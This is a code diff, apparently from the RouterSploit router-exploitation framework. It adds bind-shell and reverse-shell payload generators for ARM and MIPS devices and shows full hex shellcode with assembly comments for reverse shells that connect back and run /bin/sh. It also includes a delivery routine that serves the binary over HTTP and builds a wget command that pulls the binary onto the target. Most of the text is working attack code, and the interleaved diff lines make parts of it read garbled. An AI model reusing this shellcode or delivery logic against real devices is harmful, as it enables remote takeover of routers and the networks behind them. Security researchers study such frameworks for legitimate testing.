"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00"
"\x00\x80\x00\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
"\x00\x10\x00\x00"),
"mipsbe": ("\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x02\x00\x08\x00\x00\x00\x01\x00\x40\x00\x54\x00\x00\x00\x34"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x40\x00\x00"
"\x00\x40\x00\x00\xde\xad\xbe\xef\xde\xad\xbe\xef\x00\x00\x00\x07"
"\x00\x00\x10\x00"),
"mipsle": ("\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x08\x00\x01\x00\x00\x00\x54\x00\x40\x00\x34\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00"
"\x00\x00\x40\x00\xef\xbe\xad\xde\xef\xbe\xad\xde\x07\x00\x00\x00"
"\x00\x10\x00\x00")
}
class Payload(exploits.Exploit):
output = exploits.Option('python', 'Output type: elf/python')
filepath = exploits.Option("/tmp/{}".format(random_text(8)), 'Output file to write')
def __init__(self):
if self.architecture == "armle":
self.bigendian = False
self.header = ARCH_ELF_HEADERS['armle']
elif self.architecture == "mipsbe":
self.bigendian = True
self.header = ARCH_ELF_HEADERS['mipsbe']
elif self.architecture == "mipsle":
self.bigendian = False
self.header = ARCH_ELF_HEADERS['mipsle']
else:
print_error("Define architecture. Supported architectures: armle, mipsbe, mipsle")
return None
def run(self):
print_status("Generating payload")
self.generate()
if self.output == "elf":
with open(self.filepath, 'w+') as f:
print_status("Building ELF payload")
content = self.generate_elf()
print_success("Saving file {}".format(self.filepath))
f.write(content)
elif self.output == "python":
print_success("Building payload for python")
content = self.generate_python()
print_info(content)
def convert_ip(self, addr):
res = ""
for i in addr.split("."):
res += chr(int(i))
return res
def convert_port(self, p):
res = "%.4x" % int(p)
return res.decode('hex')
def generate_elf(self):
elf = self.header + self.payload
if self.bigendian:
p_filesz = pack(">L", len(elf))
p_memsz = pack(">L", len(elf) + len(self.payload))
else:
p_filesz = pack("<L", len(elf))
p_memsz = pack("<L", len(elf) + len(self.payload))
content = elf[:0x44] + p_filesz + p_memsz + elf[0x4c:]
return content
def generate_python(self):
res = "payload = (\n \""
for idx, x in enumerate(self.payload):
if idx % 15 == 0 and idx != 0:
res += "\"\n \""
res += "\\x%02x" % ord(x)
res += "\"\n)"
return res
routersploit/shell.py
......@@ -3,8 +3,10 @@ import telnetlib
import SimpleHTTPServer
import BaseHTTPServer
import threading
import time
from printer import printer_queue
from routersploit import validators
from routersploit.utils import (
print_info,
......@@ -14,6 +16,47 @@ from routersploit.utils import (
random_text,
)
import routersploit.modules.payloads as payloads
def bind_tcp(arch, rport):
print_status("Generating bind shell binary")
if arch == 'armle':
payload = payloads.armle_bind_tcp.Exploit()
elif arch == 'mipsle':
payload = payloads.mipsle_bind_tcp.Exploit()
elif arch == 'mipsbe':
payload = payloads.mipsbe_bind_tcp.Exploit()
else:
print_error("Platform not supported")
return None
payload.port = rport
payload.generate()
return payload.generate_elf()
def reverse_tcp(arch, lhost, lport):
print_status("Generating reverse shell binary")
if arch == 'armle':
payload = payloads.armle_reverse_tcp.Exploit()
elif arch == 'mipsle':
payload = payloads.mipsle_reverse_tcp.Exploit()
elif arch == 'mipsbe':
payload = payloads.mipsbe_reverse_tcp.Exploit()
else:
print_error("Platform not supported")
return None
payload.target = lhost
payload.port = lport
payload.generate()
return payload.generate_elf()
def shell(exploit, architecture="", method="", **params):
while 1:
......@@ -26,25 +69,40 @@ def shell(exploit, architecture="", method="", **params):
return
c = cmd.split()
if len(c) and c[0] == "reverse_tcp":
if len(c) == 3:
lhost = c[1]
lport = c[2]
revshell = reverse_shell(exploit, architecture, lhost, lport)
if len(c) and (c[0] == "bind_tcp" or c[0] == "reverse_tcp"):
options = {}
if c[0] == "bind_tcp":
try:
options['technique'] = "bind_tcp"
options['rhost'] = validators.ipv4(exploit.target)
options['rport'] = int(c[1])
options['lhost'] = c[2]
options['lport'] = int(c[3])
except:
print_error("bind_tcp <rport> <lhost> <lport>")
payload = bind_tcp(architecture, options['rport'])
elif c[0] == "reverse_tcp":
try:
options['technique'] = "reverse_tcp"
options['lhost'] = c[1]
options['lport'] = int(c[2])
except:
print_error("reverse_tcp <lhost> <lport>")
payload = reverse_tcp(architecture, options['lhost'], options['lport'])
communication = Communication(exploit, payload, options)
if method == "wget":
revshell.wget(binary=params['binary'], location=params['location'])
communication.wget(binary=params['binary'], location=params['location'])
elif method == "echo":
revshell.echo(binary=params['binary'], location=params['location'])
communication.echo(binary=params['binary'], location=params['location'])
elif method == "awk":
revshell.awk(binary=params['binary'])
communication.awk(binary=params['binary'])
elif method == "netcat":
revshell.netcat(binary=params['binary'], shell=params['shell'])
else:
print_error("Reverse shell is not available")
else:
print_error("reverse_tcp <reverse ip> <port>")
communication.netcat(binary=params['binary'], shell=params['shell'])
else:
print_info(exploit.execute(cmd))
......@@ -70,333 +128,32 @@ class HttpServer(BaseHTTPServer.HTTPServer):
self.handle_request()
class reverse_shell(object):
arm = (
# elf binary
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00"
"\x00\x00\x74\x80\x00\x00\x34\x00\x00\x00\x70\x01\x00\x00\x02\x02\x00\x05\x34\x00\x20\x00"
"\x02\x00\x28\x00\x07\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80"
"\x00\x00\x18\x01\x00\x00\x18\x01\x00\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00"
"\x18\x01\x00\x00\x18\x01\x01\x00\x18\x01\x01\x00\x0b\x00\x00\x00\x0b\x00\x00\x00\x06\x00"
"\x00\x00\x00\x80\x00\x00"
# <_start>:
"\x84\x70\x9f\xe5" # ldr r7, [pc, #132]
"\x02\x00\xa0\xe3" # mov r0, #2
"\x01\x10\xa0\xe3" # mov r1, #1
"\x00\x20\xa0\xe3" # mov r2, #0
"\x00\x00\x00\xef" # svc 0x00000000
"\x00\x60\xa0\xe1" # mov r6, r0
"\x70\x50\x9f\xe5" # ldr r5, [pc, #112] ; 8104 <loop+0x50>
"\x04\x50\x2d\xe5" # push {r5} ; (str r5, [sp, #-4]!)
"\x6c\x50\x9f\xe5" # ldr r5, [pc, #108] ; 8108 <loop+0x54>
"\x04\x50\x2d\xe5" # push {r5} ; (str r5, [sp, #-4]!)
"\x0d\x10\xa0\xe1" # mov r1, sp
"\x10\x20\xa0\xe3" # mov r2, #16
"\x60\x70\x9f\xe5" # ldr r7, [pc, #96] ; 810c <loop+0x58>
"\x00\x00\x00\xef" # svc 0x00000000
"\x06\x00\xa0\xe1" # mov r0, r6
"\x03\x10\xa0\xe3" # mov r1, #3
# <loop>:
"\x01\x10\x51\xe2" # subs r1, r1, #1
"\x3f\x70\xa0\xe3" # mov r7, #63 ; 0x3f
"\x00\x00\x00\xef" # svc 0x00000000
"\xfb\xff\xff\x1a" # bne 80b4 <loop>
"\x44\x00\x9f\xe5" # ldr r0, [pc, #68] ; 8110 <loop+0x5c>
"\x00\x10\xa0\xe1" # mov r1, r0
"\x02\x20\x22\xe0" # eor r2, r2, r2
"\x04\x20\x2d\xe5" # push {r2} ; (str r2, [sp, #-4]!)
"\x38\x10\x9f\xe5" # ldr r1, [pc, #56] ; 8114 <loop+0x60>
"\x04\x10\x2d\xe5" # push {r1} ; (str r1, [sp, #-4]!)
"\x0d\x10\xa0\xe1" # mov r1, sp
"\x0b\x70\xa0\xe3" # mov r7, #11
"\x00\x00\x00\xef" # svc 0x00000000
"\x00\x00\xa0\xe3" # mov r0, #0
"\x01\x70\xa0\xe3" # mov r7, #1
"\x00\x00\x00\xef" # svc 0x00000000
"\x01\x70\xa0\xe3" # mov r7, #1
"\x00\x00\xa0\xe3" # mov r0, #0
"\x00\x00\x00\xef" # svc 0x00000000
"\x19\x01\x00\x00" # .word 0x00000119
"\x7f\x00\x00\x01" # .word 0x0100007f
"\x02\x00\x11\x5c" # .word 0x5c110002
"\x1b\x01\x00\x00" # .word 0x0000011b
"\x18\x01\x01\x00" # .word 0x00010118
"\x20\x01\x01\x00" # .word 0x00010120
# elf binary
"\x2f\x62\x69\x6e\x2f\x73\x68\x00\x73\x68\x00\x41\x13\x00\x00\x00\x61\x65\x61\x62\x69\x00"
"\x01\x09\x00\x00\x00\x06\x01\x08\x01\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e\x73\x74\x72"
"\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x64"
"\x61\x74\x61\x00\x2e\x41\x52\x4d\x2e\x61\x74\x74\x72\x69\x62\x75\x74\x65\x73\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00"
"\x01\x00\x00\x00\x06\x00\x00\x00\x74\x80\x00\x00\x74\x00\x00\x00\xa4\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x21\x00\x00\x00\x01\x00\x00\x00"
"\x03\x00\x00\x00\x18\x01\x01\x00\x18\x01\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x27\x00\x00\x00\x03\x00\x00\x70\x00\x00\x00\x00"
"\x00\x00\x00\x00\x23\x01\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x37\x01\x00\x00\x37\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x88\x02\x00\x00"
"\x40\x01\x00\x00\x06\x00\x00\x00\x0c\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00"
"\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xc8\x03\x00\x00\x70\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x74\x80\x00\x00\x00\x00\x00\x00"
"\x03\x00\x01\x00\x00\x00\x00\x00\x18\x01\x01\x00\x00\x00\x00\x00\x03\x00\x02\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x04\x00\xf1\xff\x0f\x00\x00\x00\x18\x01\x01\x00\x00\x00\x00\x00\x00\x00"
"\x02\x00\x16\x00\x00\x00\x20\x01\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x19\x00\x00\x00"
"\x74\x80\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x1c\x00\x00\x00\xb4\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x01\x00\x21\x00\x00\x00\x00\x81\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\xf1\xff\x21\x00\x00\x00\x18\x01"
"\x01\x00\x00\x00\x00\x00\x00\x00\x02\x00\x24\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00"
"\x10\x00\x02\x00\x2f\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x3d\x00"
"\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x49\x00\x00\x00\x74\x80\x00\x00"
"\x00\x00\x00\x00\x10\x00\x01\x00\x50\x00\x00\x00\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00"
"\x02\x00\x5c\x00\x00\x00\x24\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x64\x00\x00\x00"
"\x23\x01\x01\x00\x00\x00\x00\x00\x10\x00\x02\x00\x6b\x00\x00\x00\x24\x01\x01\x00\x00\x00"
"\x00\x00\x10\x00\x02\x00\x00\x72\x65\x76\x65\x72\x73\x65\x5f\x74\x63\x70\x2e\x6f\x00\x62"
"\x69\x6e\x61\x72\x79\x00\x73\x68\x00\x24\x61\x00\x6c\x6f\x6f\x70\x00\x24\x64\x00\x5f\x62"
"\x73\x73\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x5f\x62\x73\x73\x5f\x73\x74\x61\x72\x74\x5f\x5f"
"\x00\x5f\x5f\x62\x73\x73\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f"
"\x62\x73\x73\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x65\x6e\x64\x5f\x5f\x00\x5f\x65\x64\x61"
"\x74\x61\x00\x5f\x65\x6e\x64\x00"
)
mipsel = (
# elf binary
"\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x01\x00"
"\x00\x00\x90\x00\x40\x00\x34\x00\x00\x00\x8c\x01\x00\x00\x00\x10\x00\x50\x34\x00\x20\x00"
"\x02\x00\x28\x00\x06\x00\x03\x00\x00\x00\x00\x70\x74\x00\x00\x00\x74\x00\x40\x00\x74\x00"
"\x40\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x60\x01\x00\x00\x60\x01\x00\x00\x05\x00"
"\x00\x00\x00\x00\x01\x00\xf4\x11\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x50\x81\x41\x00\x00\x00\x00\x00"
# <_ftext>:
"\xff\xff\x04\x28" # slti a0,zero,-1
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\x11\x11\x04\x28" # slti a0,zero,4369
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\xfd\xff\x0c\x24" # li t4,-3
"\x27\x20\x80\x01" # nor a0,t4,zero
"\xa6\x0f\x02\x24" # li v0,4006
"\x0c\x09\x09\x01" # syscall 0x42424
"\xfd\xff\x0c\x24" # li t4,-3
"\x27\x20\x80\x01" # nor a0,t4,zero
"\x27\x28\x80\x01" # nor a1,t4,zero
"\xff\xff\x06\x28" # slti a2,zero,-1
"\x57\x10\x02\x24" # li v0,4183
"\x0c\x09\x09\x01" # syscall 0x42424
"\xff\xff\x44\x30" # andi a0,v0,0xffff
"\xc9\x0f\x02\x24" # li v0,4041
"\x0c\x09\x09\x01" # syscall 0x42424
"\xc9\x0f\x02\x24" # li v0,4041
"\x0c\x09\x09\x01" # syscall 0x42424
"\x7a\x69\x05\x3c" # lui a1,0x697a
"\x02\x00\xa5\x34" # ori a1,a1,0x2
"\xf8\xff\xa5\xaf" # sw a1,-8(sp)
"\x00\x01\x05\x3c" # lui a1,0x100
"\x7f\x00\xa5\x34" # ori a1,a1,0x7f
"\xfc\xff\xa5\xaf" # sw a1,-4(sp)
"\xf8\xff\xa5\x23" # addi a1,sp,-8
"\xef\xff\x0c\x24" # li t4,-17
"\x27\x30\x80\x01" # nor a2,t4,zero
"\x4a\x10\x02\x24" # li v0,4170
"\x0c\x09\x09\x01" # syscall 0x42424
"\x62\x69\x08\x3c" # lui t0,0x6962
"\x2f\x2f\x08\x35" # ori t0,t0,0x2f2f
"\xec\xff\xa8\xaf" # sw t0,-20(sp)
"\x73\x68\x08\x3c" # lui t0,0x6873
"\x6e\x2f\x08\x35" # ori t0,t0,0x2f6e
"\xf0\xff\xa8\xaf" # sw t0,-16(sp)
"\xff\xff\x07\x28" # slti a3,zero,-1
"\xf4\xff\xa7\xaf" # sw a3,-12(sp)
"\xfc\xff\xa7\xaf" # sw a3,-4(sp)
"\xec\xff\xa4\x23" # addi a0,sp,-20
"\xec\xff\xa8\x23" # addi t0,sp,-20
"\xf8\xff\xa8\xaf" # sw t0,-8(sp)
"\xf8\xff\xa5\x23" # addi a1,sp,-8
"\xec\xff\xbd\x27" # addiu sp,sp,-20
"\xff\xff\x06\x28" # slti a2,zero,-1
"\xab\x0f\x02\x24" # li v0,4011
"\x0c\x09\x09\x01" # syscall 0x42424
# elf binary
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e"
"\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x72\x65\x67\x69"
"\x6e\x66\x6f\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x00\x00\x00\x06\x00\x00\x70\x02\x00\x00\x00\x74\x00"
"\x40\x00\x74\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00"
"\x18\x00\x00\x00\x24\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x90\x00\x40\x00\x90\x00"
"\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00"
"\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x60\x01\x00\x00\x2a\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00"
"\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7c\x02\x00\x00\xc0\x00\x00\x00\x05\x00"
"\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00\x00\x00\x03\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x3c\x03\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x74\x00\x40\x00\x00\x00\x00\x00\x03\x00\x01\x00\x00\x00"
"\x00\x00\x90\x00\x40\x00\x00\x00\x00\x00\x03\x00\x02\x00\x01\x00\x00\x00\x60\x01\x41\x00"
"\x00\x00\x00\x00\x10\x00\x02\x00\x08\x00\x00\x00\x50\x81\x41\x00\x00\x00\x00\x00\x10\x00"
"\xf1\xff\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x14\x00\x00\x00"
"\x90\x00\x40\x00\x00\x00\x00\x00\x10\x00\x02\x00\x1b\x00\x00\x00\x90\x00\x40\x00\x00\x00"
"\x00\x00\x11\x00\x02\x00\x22\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff"
"\x2e\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff\x35\x00\x00\x00\x60\x01"
"\x41\x00\x00\x00\x00\x00\x10\x00\xf1\xff\x3a\x00\x00\x00\x60\x01\x41\x00\x00\x00\x00\x00"
"\x10\x00\xf1\xff\x00\x5f\x66\x64\x61\x74\x61\x00\x5f\x67\x70\x00\x5f\x5f\x73\x74\x61\x72"
"\x74\x00\x5f\x66\x74\x65\x78\x74\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x62\x73\x73\x5f"
"\x73\x74\x61\x72\x74\x00\x5f\x65\x64\x61\x74\x61\x00\x5f\x65\x6e\x64\x00\x5f\x66\x62\x73"
"\x73\x00"
)
mips = (
# elf binary
"\x7f\x45\x4c\x46\x01\x02\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x08\x00\x00"
"\x00\x01\x00\x40\x00\x90\x00\x00\x00\x34\x00\x00\x01\x8c\x50\x00\x10\x00\x00\x34\x00\x20"
"\x00\x02\x00\x28\x00\x06\x00\x03\x70\x00\x00\x00\x00\x00\x00\x74\x00\x40\x00\x74\x00\x40"
"\x00\x74\x00\x00\x00\x18\x00\x00\x00\x18\x00\x00\x00\x04\x00\x00\x00\x04\x00\x00\x00\x01"
"\x00\x00\x00\x00\x00\x40\x00\x00\x00\x40\x00\x00\x00\x00\x01\x60\x00\x00\x01\x60\x00\x00"
"\x00\x05\x00\x01\x00\x00\x20\x00\x11\xf4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x41\x81\x50\x00\x00\x00\x00"
# <_ftext>:
"\x28\x04\xff\xff" # slti a0,zero,-1
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x28\x04\x11\x11" # slti a0,zero,4369
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x0c\xff\xfd" # li t4,-3
"\x01\x80\x20\x27" # nor a0,t4,zero
"\x24\x02\x0f\xa6" # li v0,4006
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x0c\xff\xfd" # li t4,-3
"\x01\x80\x20\x27" # nor a0,t4,zero
"\x01\x80\x28\x27" # nor a1,t4,zero
"\x28\x06\xff\xff" # slti a2,zero,-1
"\x24\x02\x10\x57" # li v0,4183
"\x01\x09\x09\x0c" # syscall 0x42424
"\x30\x44\xff\xff" # andi a0,v0,0xffff
"\x24\x02\x0f\xc9" # li v0,4041
"\x01\x09\x09\x0c" # syscall 0x42424
"\x24\x02\x0f\xc9" # li v0,4041
"\x01\x09\x09\x0c" # syscall 0x42424
"\x3c\x05\x00\x02" # lui a1,0x2
"\x34\xa5\x7a\x69" # ori a1,a1,0x7a69
"\xaf\xa5\xff\xf8" # sw a1,-8(sp)
"\x3c\x05\xc0\xa8" # lui a1,0xc0a8
"\x34\xa5\x01\x37" # ori a1,a1,0x137
"\xaf\xa5\xff\xfc" # sw a1,-4(sp)
"\x23\xa5\xff\xf8" # addi a1,sp,-8
"\x24\x0c\xff\xef" # li t4,-17
"\x01\x80\x30\x27" # nor a2,t4,zero
"\x24\x02\x10\x4a" # li v0,4170
"\x01\x09\x09\x0c" # syscall 0x42424
"\x3c\x08\x2f\x2f" # lui t0,0x2f2f
"\x35\x08\x62\x69" # ori t0,t0,0x6269
"\xaf\xa8\xff\xec" # sw t0,-20(sp)
"\x3c\x08\x6e\x2f" # lui t0,0x6e2f
"\x35\x08\x73\x68" # ori t0,t0,0x7368
"\xaf\xa8\xff\xf0" # sw t0,-16(sp)
"\x28\x07\xff\xff" # slti a3,zero,-1
"\xaf\xa7\xff\xf4" # sw a3,-12(sp)
"\xaf\xa7\xff\xfc" # sw a3,-4(sp)
"\x23\xa4\xff\xec" # addi a0,sp,-20
"\x23\xa8\xff\xec" # addi t0,sp,-20
"\xaf\xa8\xff\xf8" # sw t0,-8(sp)
"\x23\xa5\xff\xf8" # addi a1,sp,-8
"\x27\xbd\xff\xec" # addiu sp,sp,-20
"\x28\x06\xff\xff" # slti a2,zero,-1
"\x24\x02\x0f\xab" # li v0,4011
"\x00\x90\x93\x4c" # syscall 0x2424d
# elf binary
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x2e\x73\x79\x6d\x74\x61\x62\x00\x2e"
"\x73\x74\x72\x74\x61\x62\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x72\x65\x67\x69"
"\x6e\x66\x6f\x00\x2e\x74\x65\x78\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\x70\x00\x00\x06\x00\x00\x00\x02\x00\x40"
"\x00\x74\x00\x00\x00\x74\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04"
"\x00\x00\x00\x18\x00\x00\x00\x24\x00\x00\x00\x01\x00\x00\x00\x06\x00\x40\x00\x90\x00\x00"
"\x00\x90\x00\x00\x00\xd0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00"
"\x00\x00\x00\x11\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x60\x00\x00"
"\x00\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01"
"\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x7c\x00\x00\x00\xc0\x00\x00"
"\x00\x05\x00\x00\x00\x03\x00\x00\x00\x04\x00\x00\x00\x10\x00\x00\x00\x09\x00\x00\x00\x03"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x3c\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x40\x00\x74\x00\x00\x00\x00\x03\x00\x00\x01\x00\x00"
"\x00\x00\x00\x40\x00\x90\x00\x00\x00\x00\x03\x00\x00\x02\x00\x00\x00\x01\x00\x41\x01\x60"
"\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x08\x00\x41\x81\x50\x00\x00\x00\x00\x10\x00"
"\xff\xf1\x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x14"
"\x00\x40\x00\x90\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\x1b\x00\x40\x00\x90\x00\x00"
"\x00\x00\x11\x00\x00\x02\x00\x00\x00\x22\x00\x41\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1"
"\x00\x00\x00\x2e\x00\x41\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1\x00\x00\x00\x35\x00\x41"
"\x01\x60\x00\x00\x00\x00\x10\x00\xff\xf1\x00\x00\x00\x3a\x00\x41\x01\x60\x00\x00\x00\x00"
"\x10\x00\xff\xf1\x00\x5f\x66\x64\x61\x74\x61\x00\x5f\x67\x70\x00\x5f\x5f\x73\x74\x61\x72"
"\x74\x00\x5f\x66\x74\x65\x78\x74\x00\x5f\x73\x74\x61\x72\x74\x00\x5f\x5f\x62\x73\x73\x5f"
"\x73\x74\x61\x72\x74\x00\x5f\x65\x64\x61\x74\x61\x00\x5f\x65\x6e\x64\x00\x5f\x66\x62\x73"
"\x73\x00"
)
exploit = None
arch = None
lhost = None
lport = None
binary_name = None
revshell = None
def __init__(self, exploit, arch, lhost, lport):
class Communication(object):
def __init__(self, exploit, payload, options):
self.exploit = exploit
self.arch = arch
self.lhost = lhost
self.lport = lport
def convert_ip(self, addr):
res = ""
for i in addr.split("."):
res += chr(int(i))
return res
def convert_port(self, p):
res = "%.4x" % int(p)
return res.decode('hex')
def generate_binary(self, lhost, lport):
print_status("Generating reverse shell binary")
self.payload = payload
self.options = options
self.binary_name = random_text(8)
ip = self.convert_ip(lhost)
port = self.convert_port(lport)
if self.arch == 'arm':
self.revshell = self.arm[:0x104] + ip + self.arm[0x108:0x10a] + port + self.arm[0x10c:]
elif self.arch == 'mipsel':
self.revshell = self.mipsel[:0xe4] + port + self.mipsel[0xe6:0xf0] + ip[2:] + self.mipsel[0xf2:0xf4] + ip[:2] + self.mipsel[0xf6:]
elif self.arch == 'mips':
self.revshell = self.mips[:0xea] + port + self.mips[0xec:0xf2] + ip[:2] + self.mips[0xf4:0xf6] + ip[2:] + self.mips[0xf8:]
else:
print_error("Platform not supported")
def http_server(self, lhost, lport):
print_status("Setting up HTTP server")
server = HttpServer((lhost, int(lport)), HttpRequestHandler)
server.serve_forever(self.revshell)
server.serve_forever(self.payload)
server.server_close()
def wget(self, binary, location):
print_status("Using wget method")
# generate binary
self.generate_binary(self.lhost, self.lport)
# run http server
thread = threading.Thread(target=self.http_server, args=(self.lhost, self.lport))
thread = threading.Thread(target=self.http_server, args=(self.options['lhost'], self.options['lport']))
thread.start()
# wget binary
print_status("Using wget to download binary")
cmd = "{} http://{}:{}/{} -O {}/{}".format(binary,
self.lhost,
self.lport,
self.options['lhost'],
self.options['lport'],
self.binary_name,
location,
self.binary_name)
